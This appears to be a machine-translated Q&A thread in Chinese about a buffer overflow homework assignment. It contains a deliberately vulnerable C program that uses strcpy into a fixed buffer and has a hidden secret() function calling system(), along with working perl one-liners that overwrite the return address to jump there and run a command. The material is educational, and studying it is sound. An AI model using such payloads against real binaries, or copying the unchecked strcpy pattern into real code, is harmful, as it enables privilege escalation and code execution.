利用堆栈缓冲区溢出

Question

我正在执行缓冲区溢出分配，但我坚持使用此命令的语法：

$ ./script $(perl -e 'print "A" x 36 . "\x40\x83\x04\x08"' | touch test.txt)

我们预计将使用这一衬管而不是 shell。 返回地址是正确的，它将我带到程序集中的正确位置，但是当我运行它时，函数以标准用户身份执行，而不是以 root 身份运行。

据我所知，问题在于语法或引号。

我怎样才能纠正一个班轮？

脚本来源

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>

char arg1[60];
char arg2[60];

void func(char *s){
    char buf[32];
    strcpy(buf, s);
    
    printf("you entered: %s\n", buf);
}

void secret(){
  system(arg2);
}

int main(int argc, char *argv[]){
    if(argc < 2){
        printf("Usage: %s some_string\n", argv[0]);
        return 2;
    }
    strcpy(arg1, argv[1]);

    if (argc == 3) {
      strcpy(arg2, argv[2]);
    }
      
    func(argv[1]);
    return 0;
}

Answer 1

我想你说的那部分| touch test.txt) | touch test.txt)是不需要的。

./script $(perl -e 'print "A" x 36 . "\x40\x83\x04\x08"') "touch test.txt"

应该管用。

我不确定您为什么要将 shell 脚本的 output 传递给touch命令（我假设您要利用的缓冲区溢出在脚本中，并且最终以某种方式使用第二个参数作为函数的参数） .

至于为什么它以普通用户身份执行，在您的场景中，您的 shell 以普通用户身份运行touch 。 我认为您想要做的是以root身份运行您的脚本（通过使其成为setuid 二进制文件或仅使用sudo运行程序，并使脚本实际执行对system("touch...");的调用。

Answer 2

经过一些修补，以及来自社区的大量帮助，解决方案是使用：

./step4 `perl -e 'print "A" x 36. "\x94\x84\x04\x08"'` "touch test.txt"

我检查了 gdb 中的程序集，称为秘密 function 的正确地址，并通过将 $() 交换为反引号，攻击按预期执行。 非常感谢 Marco 在这方面的帮助。